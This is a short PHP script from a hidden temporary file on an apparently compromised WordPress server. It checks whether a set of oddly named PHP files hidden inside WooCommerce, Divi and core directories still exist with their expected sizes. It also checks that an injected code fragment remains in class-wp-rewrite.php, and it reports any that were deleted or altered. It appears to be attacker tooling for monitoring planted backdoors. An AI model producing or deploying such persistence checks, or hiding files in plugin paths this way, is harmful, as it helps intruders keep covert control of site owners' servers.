File: //var/tmp/.ent
<?php   $r = '/home/omoy/tbs.omoy.org'; $x = ["/wp-content/plugins/woocommerce/client/legacy/js/photoswipe/menu.item.table.php"=>"bd@@272650376@@536",
"/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php"=>"bd@@272594059@@3881",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/query/commands.php"=>"bd@@272534432@@535",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/gc_details.php"=>"bd@@272544700@@535",
"/wp-content/plugins/woocommerce/vendor/symfony/css-selector/XPath/Extension/FixNesting.php"=>"bd@@272587500@@647",
"/wp-content/plugins/woocommerce/includes/data-stores/class-wc-shipping-zone-data-store.php"=>"bd@@272553726@@11829",
"/wp-includes/class-wp-rewrite.php"=>"ui@@41112@@init($uri,"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');